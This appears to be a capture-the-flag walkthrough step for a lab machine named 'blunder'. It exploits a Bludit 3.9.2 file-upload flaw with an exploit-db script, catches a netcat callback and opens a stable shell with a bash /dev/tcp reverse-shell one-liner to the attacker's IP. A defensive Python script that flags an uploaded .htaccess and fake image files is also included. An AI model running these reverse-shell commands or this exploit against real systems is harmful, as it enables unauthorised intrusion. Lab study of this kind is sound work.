3 bludit 3.9.2 file_upload RCE

Using https://www.exploit-db.com/exploits/48701

$ python3 48701-file.py 
cookie: ogetiq28sukr38m0gjistbrk07
csrf_token: 2f7cdac3e6ecce6667ceeb397f071b4199d8e672
Uploading payload: evil.png
Uploading payload: .htaccess

Viewing http://10.10.10.191/bl-content/tmp/temp/evil.png triggers the payload, which connects back to the listener:
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.191] 45694
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
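
Detection side of the upload shown above, as an added example (not part of the original notes or of the exploit-db script): a triage script that walks an upload directory and flags a dropped .htaccess and image-named files that are not really images. The function names, the magic-byte list and the sample tree are constructed for illustration, and it assumes the uploaded image carries PHP code.

```python
import os
import tempfile

IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif"}
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")
SCRIPT_MARKERS = (b"<?php", b"<?=")


def audit_upload_dir(root):
    """Return sorted (relative_path, reason) findings under an upload directory."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                data = fh.read(1024 * 1024)  # first 1 MiB is enough for triage
            if name == ".htaccess":
                # A per-directory override file has no business in an upload path
                findings.append((rel, "htaccess in upload directory"))
                continue
            if os.path.splitext(name)[1].lower() in IMAGE_EXTS:
                if not data.startswith(IMAGE_MAGIC):
                    findings.append((rel, "image extension without image magic bytes"))
                if any(marker in data for marker in SCRIPT_MARKERS):
                    findings.append((rel, "PHP tag inside image file"))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample data: one benign image plus the two file names from the output above."""
    tmp = os.path.join(root, "tmp", "temp")
    os.makedirs(tmp)
    with open(os.path.join(root, "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    with open(os.path.join(tmp, "evil.png"), "wb") as fh:
        fh.write(b"<?php /* constructed placeholder, no payload */ ?>")
    with open(os.path.join(tmp, ".htaccess"), "wb") as fh:
        fh.write(b"# constructed placeholder\n")
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        for rel, reason in audit_upload_dir(build_sample_tree(d)):
            print(f"{rel}: {reason}")
```

On a real host, point audit_upload_dir at the site's bl-content directory. Setting Apache's AllowOverride None for that directory keeps an uploaded .htaccess from taking effect.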

Stable Shell

bash -c 'bash -i >& /dev/tcp/10.10.16.161/7070 0>&1'

$ rlwrap nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.191] 53018
bash: cannot set terminal process group (1075): Inappropriate ioctl for device
bash: no job control in this shell
www-data@blunder:/var/www/bludit-3.9.2$
